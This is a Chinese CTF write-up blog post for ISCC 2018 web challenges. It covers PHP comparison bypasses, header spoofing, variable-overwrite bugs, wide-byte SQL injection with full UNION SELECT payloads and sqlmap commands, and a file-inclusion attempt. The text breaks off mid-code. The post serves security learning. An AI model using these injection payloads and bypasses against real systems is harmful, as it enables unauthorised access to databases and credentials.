<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="default">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="CTF,">










<meta name="description" content="比较数字大小12&amp;lt;input type=&quot;text&quot; maxlength=&quot;3&quot; name=&quot;v&quot;&amp;gt;&amp;lt;input type=&quot;submit&quot; value=&quot;提交&quot;&amp;gt; maxlength限制了输入字符串长度，直接F12-Elements中修改或去掉maxlength，或者burp修改name的值。 key is 768HKyu678567&amp;amp;*&amp;amp;K web01输">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="iscc2018 writeup">
<meta property="og:url" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/index.html">
<meta property="og:site_name" content="m3lon">
<meta property="og:description" content="比较数字大小12&amp;lt;input type=&quot;text&quot; maxlength=&quot;3&quot; name=&quot;v&quot;&amp;gt;&amp;lt;input type=&quot;submit&quot; value=&quot;提交&quot;&amp;gt; maxlength限制了输入字符串长度，直接F12-Elements中修改或去掉maxlength，或者burp修改name的值。 key is 768HKyu678567&amp;amp;*&amp;amp;K web01输">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/2.png">
<meta property="og:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/1.png">
<meta property="og:image" content="https://ohduknodm.qnssl.com/20170525149569330192390.jpg">
<meta property="og:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/13.png">
<meta property="og:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/11.png">
<meta property="og:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/WhatIsThat.png">
<meta property="og:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/5.png">
<meta property="og:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/6.png">
<meta property="og:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/7.png">
<meta property="og:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/8.png">
<meta property="og:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/9.png">
<meta property="og:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/14.png">
<meta property="og:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/15.png">
<meta property="og:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/16.png">
<meta property="og:updated_time" content="2019-02-21T12:03:09.025Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="iscc2018 writeup">
<meta name="twitter:description" content="比较数字大小12&amp;lt;input type=&quot;text&quot; maxlength=&quot;3&quot; name=&quot;v&quot;&amp;gt;&amp;lt;input type=&quot;submit&quot; value=&quot;提交&quot;&amp;gt; maxlength限制了输入字符串长度，直接F12-Elements中修改或去掉maxlength，或者burp修改name的值。 key is 768HKyu678567&amp;amp;*&amp;amp;K web01输">
<meta name="twitter:image" content="http://m3lon.github.io/2018/05/25/iscc2018-writeup/2.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.3',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>







  <title>iscc2018 writeup | m3lon</title>
  








  <style>
	blockquote {
	  color: #888;
	  background-color: #eae6f3;
	  border-left: 1rem solid #5236a0;
	  padding: 0 1.5rem;
	  position: relative;
	  font-family: 'Roboto', sans-serif;
	}

	blockquote:before,
	blockquote:after {
	  color: #392570;
	  font-size: 2.5rem;
	  position: absolute;
	  line-height: 2.5rem;
	}

	blockquote:before {
	  content: "\201C";
	  left: -1rem;
	  top: 0;
	}

	blockquote:after {
	  content: "\201D";
	  right: 0;
	  bottom: -1rem;
	}
</style>
</head>


<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <a href="https://github.com/m3lon" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewbox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">m3lon</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://m3lon.github.io/2018/05/25/iscc2018-writeup/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="m3lon">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/UMR.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="m3lon">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">iscc2018 writeup</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-05-25T20:33:38+08:00">
                2018-05-25
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="比较数字大小"><a href="#比较数字大小" class="headerlink" title="比较数字大小"></a>比较数字大小</h3><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">maxlength</span>=<span class="string">"3"</span> <span class="attr">name</span>=<span class="string">"v"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">value</span>=<span class="string">"提交"</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>maxlength限制了输入字符串长度，直接F12-Elements中修改或去掉maxlength，或者burp修改name的值。</p>
<p>key is 768HKyu678567&amp;*&amp;K</p>
<h3 id="web01"><a href="#web01" class="headerlink" title="web01"></a>web01</h3><p>输入<code>http://118.190.152.202:8003/?password[]=1</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">highlight_file(<span class="string">'2.php'</span>); </span><br><span class="line">$flag=<span class="string">'&#123;***************&#125;'</span>; </span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'password'</span>])) &#123;   </span><br><span class="line">    <span class="keyword">if</span> (strcmp($_GET[<span class="string">'password'</span>], $flag) == <span class="number">0</span>)   </span><br><span class="line">        <span class="keyword">die</span>(<span class="string">'Flag: '</span>.$flag);   </span><br><span class="line">    <span class="keyword">else</span>   </span><br><span class="line">        <span class="keyword">print</span> <span class="string">'Invalid password'</span>;   </span><br><span class="line">&#125;   </span><br><span class="line"><span class="meta">?&gt;</span> Flag: ISCC&#123;iscc_ef3w5r5tw_5rg5y6s3t3&#125;</span><br></pre></td></tr></table></figure>
<h3 id="为什么这么简单啊"><a href="#为什么这么简单啊" class="headerlink" title="为什么这么简单啊"></a>为什么这么简单啊</h3><p>题目要求：第二关需要从 <a href="http://edu.xss.tv" target="_blank" rel="noopener">http://edu.xss.tv</a> 进入，并且只有我公司的IP地址才可以进入第二关，公司IP为：110.110.110.110</p>
<p>headers头部中referer修改来源；X-Forwarded-For可以伪造ip，进入第二关</p>
<p>查看网页源代码发现</p>
<p><code>&lt;script type=&quot;text/javascript&quot; src=&quot;./password.js&quot;&gt;&lt;/script&gt;</code></p>
<p>打开文件，存在一串base64，解码后得到<code>&lt;script&gt;alert(&quot;password:xinyiji.com&quot;)&lt;/script&gt;</code></p>
<p>您的flag为：B1H3n5u0xI2n9JIscc</p>
<h3 id="web02"><a href="#web02" class="headerlink" title="web02"></a>web02</h3><p>在请求头部添加中X-forwarded-for:127.0.0.1失败；换用 client-ip:127.0.0.1 成功</p>
<p>Great! ISCC{iscc_059eeb8c0c33eb62}</p>
<h3 id="Please-give-me-username-and-password"><a href="#Please-give-me-username-and-password" class="headerlink" title="Please give me username and password!"></a>Please give me username and password!</h3><p>师兄指点下发现备份文件：index.php.txt</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">$flag = <span class="string">"***********"</span>;	</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'username'</span>]))&#123;</span><br><span class="line">	<span class="keyword">if</span> (<span class="number">0</span> == strcasecmp($flag,$_GET[<span class="string">'username'</span>]))&#123;</span><br><span class="line">	$a = fla;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"very good!Username is right"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span>&#123;</span><br><span class="line">	<span class="keyword">print</span> <span class="string">'Username is not right&lt;!--index.php.txt--&gt;'</span>;&#125;</span><br><span class="line">&#125;<span class="keyword">else</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">'Please give me username or password!'</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'password'</span>]))&#123;</span><br><span class="line">	<span class="keyword">if</span> (is_numeric($_GET[<span class="string">'password'</span>]))&#123;</span><br><span class="line">		<span class="keyword">if</span> (strlen($_GET[<span class="string">'password'</span>]) &lt; <span class="number">4</span>)&#123;</span><br><span class="line">			<span class="keyword">if</span> ($_GET[<span class="string">'password'</span>] &gt; <span class="number">999</span>)&#123;</span><br><span class="line">			$b = g;</span><br><span class="line">			<span class="keyword">print</span> <span class="string">'&lt;p&gt;very good!Password is right&lt;/p&gt;'</span>;</span><br><span class="line">		&#125;<span class="keyword">else</span> </span><br><span class="line">			<span class="keyword">print</span> <span class="string">'&lt;p&gt;Password too little&lt;/p&gt;'</span>;</span><br><span class="line">		&#125;<span class="keyword">else</span></span><br><span class="line">		<span class="keyword">print</span> <span class="string">'&lt;p&gt;Password too long&lt;/p&gt;'</span>;</span><br><span class="line">	&#125;<span class="keyword">else</span></span><br><span class="line">	<span class="keyword">print</span> <span class="string">'&lt;p&gt;Password is not numeric&lt;/p&gt;'</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> ($a.$b == <span class="string">"flag"</span>)</span><br><span class="line">	<span class="keyword">print</span> $flag;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>输入<code>http://118.190.152.202:8017/?password=8e9&amp;username[]=a</code></p>
<p>flag:ISCC2018_Very_GOOD!</p>
<h3 id="php是世界上最好的语言"><a href="#php是世界上最好的语言" class="headerlink" title="php是世界上最好的语言"></a>php是世界上最好的语言</h3><p>用户名、密码处输入<code>QNKCDZO</code>, 得到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="keyword">include</span> <span class="string">'flag.php'</span>; </span><br><span class="line">$a = @$_REQUEST[<span class="string">'a'</span>]; </span><br><span class="line">str_replace(<span class="string">"&#123;"</span>,<span class="string">""</span>,$a); </span><br><span class="line">str_replace(<span class="string">"&#125;"</span>,<span class="string">""</span>,$a); </span><br><span class="line">@<span class="keyword">eval</span>(<span class="string">"var_dump($$a);"</span>); </span><br><span class="line">show_source(<span class="keyword">__FILE__</span>); </span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>变量覆盖，输入</p>
<p><code>http://118.190.152.202:8005/no_md5.php?a=GLOBALS</code>  flag:a39f9a1ff7eb4bab8a6a21b2ce111b4</p>
<h3 id="一切都是套路"><a href="#一切都是套路" class="headerlink" title="一切都是套路"></a>一切都是套路</h3><p>提示：好像有个文件忘记删了,于是可以想到源码泄露，测试了.bak,.swp等都没有，尝试了dirsearch、御剑等扫描工具也没收获，后台在师兄的提示下，发现了index.php.txt……Orz</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span> <span class="string">"flag.php"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($_SERVER[<span class="string">"REQUEST_METHOD"</span>] != <span class="string">"POST"</span>)</span><br><span class="line">	<span class="keyword">die</span>(<span class="string">"flag is here"</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>($_POST[<span class="string">"flag"</span>]) )</span><br><span class="line">	<span class="keyword">die</span>($_403);</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span> ($_GET <span class="keyword">as</span> $k =&gt; $v)&#123;</span><br><span class="line">	$$k = $$v;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span> ($_POST <span class="keyword">as</span> $k =&gt; $v)&#123;</span><br><span class="line">	$$k = $v;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ( $_POST[<span class="string">"flag"</span>] !== $flag )</span><br><span class="line">	<span class="keyword">die</span>($_403);</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"flag: "</span>. $flag . <span class="string">"\n"</span>;</span><br><span class="line"><span class="keyword">die</span>($_200);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>可以发现存在变量覆盖，又必须post flag参数，也就是说<code>$flag</code>一定会被覆盖，思考良久，注意到，似乎有一段代码很多余</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span> ($_GET <span class="keyword">as</span> $k =&gt; $v)&#123;</span><br><span class="line">	$$k = $$v;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>所以想到可以将$flag赋值给其他可打印变量，如\$_200</p>
<p><img src="2.png" alt=""></p>
<p>智商真是捉急……，大佬肯定都是分分钟做出来的 2333333~</p>
<h3 id="SQL注入的艺术"><a href="#SQL注入的艺术" class="headerlink" title="SQL注入的艺术"></a>SQL注入的艺术</h3><ul>
<li><p>测试(字符型 or 数字型)</p>
<p>1’ and 1=1%23</p>
<p>1’ and 1=2%23</p>
<p>1 and 1=1%23</p>
<p>1 and 1=2%23 </p>
<p>1abcd</p>
<p>结果都是返回id=1的结果 于是猜测可能是字符型，也可能是使用了intval，然而始终测试失败，于是关注编码gb2312，测试宽字节注入</p>
<p>1%df%27 and 1=1%23  #显示id=1的结果</p>
<p>1%df%27 and 1=2%23 #无显示</p>
<p>判断为宽字节注入，可能使用了addslashes等函数；界面中显示sql语句查询的部分信息，于是为明显。</p>
</li>
<li><p>查询列数</p>
<p><strong>union select</strong> </p>
<figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">UNION</span> <span class="built_in">SELECT</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="meta">#</span></span><br><span class="line"><span class="built_in">UNION</span> ALL <span class="built_in">SELECT</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="meta">#</span></span><br><span class="line"><span class="built_in">UNION</span> ALL <span class="built_in">SELECT</span> <span class="built_in">null</span>,<span class="built_in">null</span>,<span class="built_in">null</span> <span class="meta">#</span></span><br></pre></td></tr></table></figure>
<p><strong>order by</strong></p>
<p>利用二分法</p>
<figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">ORDER</span> <span class="title">BY</span> <span class="number">10</span> <span class="comment">#</span></span><br><span class="line"><span class="keyword">ORDER</span> <span class="title">BY</span> <span class="number">5</span>  <span class="comment">#</span></span><br><span class="line"><span class="keyword">ORDER</span> <span class="title">BY</span> <span class="number">2</span>  <span class="comment">#</span></span><br><span class="line">....</span><br></pre></td></tr></table></figure>
<p>先利用<code>1%df%27 order by 8%23</code>测试字段数为8;再利用<code>-1%df%27 select 1,2,3,4,5,6,7,8</code>测试</p>
<p><img src="1.png" alt=""></p>
<p>2，4，7的位置存在信息泄露</p>
</li>
<li><p>手动注入</p>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># 数据库 baji</span><br><span class="line">2%df%27union select 1,(SELECT database()),3,4,5,6,7,8%23</span><br><span class="line"># 表名 admins</span><br><span class="line">2%df%27union select 1,(SELECT GROUP_CONCAT(table_name SEPARATOR+0x3c62723e) FROM+INFORMATION_SCHEMA.tables WHERE TABLE_SCHEMA=0x62616a69),3,4,5,6,7,8%23</span><br><span class="line"># 字段 flag</span><br><span class="line">2%df%27union select 1,(SELECT GROUP_CONCAT(column_name SEPARATOR+0x3c62723e) FROM+INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x61646D696E73),3,4,5,6,7,8%23</span><br><span class="line"># 内容 Y0u_@@33w_dxxmn_9rf0Od</span><br><span class="line">2%df%27union select 1,(SELECT flag from admins),3,4,5,6,7,8%23</span><br></pre></td></tr></table></figure>
</li>
<li><p>工具注入</p>
<blockquote>
<p>–threads 10 //如果你玩过 msfconsole的话会对这个很熟悉 sqlmap线程最高设置为10</p>
<p>–level 3     //sqlmap默认测试所有的GET和POST参数，当–level的值大于等于2的时候也会测试HTTP Cookie头的值，当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高可到5</p>
<p>–risk 3       // 执行测试的风险（0-3，默认为1）risk越高，越慢但是越安全</p>
<p>–search   //后面跟参数 -D -T -C 搜索列（S），表（S）和或数据库名称（S） 如果你脑子够聪明，应该知道库列表名中可能会有ctf,flag等字样，结果有时候题目就是这么耿直对吧？</p>
<p>–flush-session //如果不想用之前缓存这个目标的session文件，可以使用这个参数。 会清空之前的session，重新测试该目标。</p>
</blockquote>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u "http://118.190.152.202:8015/?id=2%df" --search -C flag --thread 10 --level 3</span><br></pre></td></tr></table></figure>
<p>​    除了在id处指明%df，还可以使用宽字节注入脚本–tamper=unmagicquotes.py</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -u "http://118.190.152.202:8015/?id=1" --search -C flag --thread 10 --level 3 --tamper=unmagicquotes.py --flush-session</span><br></pre></td></tr></table></figure>
<h3 id="试试看"><a href="#试试看" class="headerlink" title="试试看"></a>试试看</h3><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">"show.php?img=1.jpg"</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>img参数首先考虑到的是否存在文件包含，源码泄露</p>
<p>成功利用文件包含的条件</p>
<ul>
<li>inclued()等通过动态变量的方法引入需要包含的文件</li>
<li>动态变量用户可控</li>
</ul>
<p>针对于这道题，猜测后台的show.php的代码，不知道是否用了include等函数，测试过程中发现，参数后缀必须为<code>.jpg</code>，否则<code>file not found</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$img = $_GET[<span class="string">'img'</span>];</span><br><span class="line"><span class="keyword">if</span>( preg_match(<span class="string">'/\.jpg$/is'</span>, $img) ) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;img src='"</span>.$img.<span class="string">"'&gt;"</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"file not found"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>所以需要绕过<code>.jpg</code> ，如果绕过呢？开始查找各种奇淫技巧</p>
<ul>
<li><p>%00截断</p>
<p>400 Bad Request </p>
<p>Your browser sent a request that this server could not understand.</p>
<p>Apache/2.4.10 (Debian) Server at 172.17.0.32 Port 80</p>
<p>出现了 Status Code：<code>Http 400 Bad Request</code> 错误的一种原因就是：参数匹配。包括以下两方面：</p>
<ol>
<li>请求时没有传递必须的参数；</li>
<li>传递的参数类型不匹配，比如<code>areaOrSchoolId</code> 需为 <code>int</code>型，若传到后台的是<code>string</code>型则也会出现类似的错误。</li>
</ol>
<p>​</p>
</li>
<li><p>TODO…</p>
</li>
</ul>
<p>​</p>
<h3 id="Only-admin-can-see-flag"><a href="#Only-admin-can-see-flag" class="headerlink" title="Only admin can see flag"></a>Only admin can see flag</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">'sqlwaf.php'</span>;</span><br><span class="line">define(<span class="string">"SECRET_KEY"</span>, <span 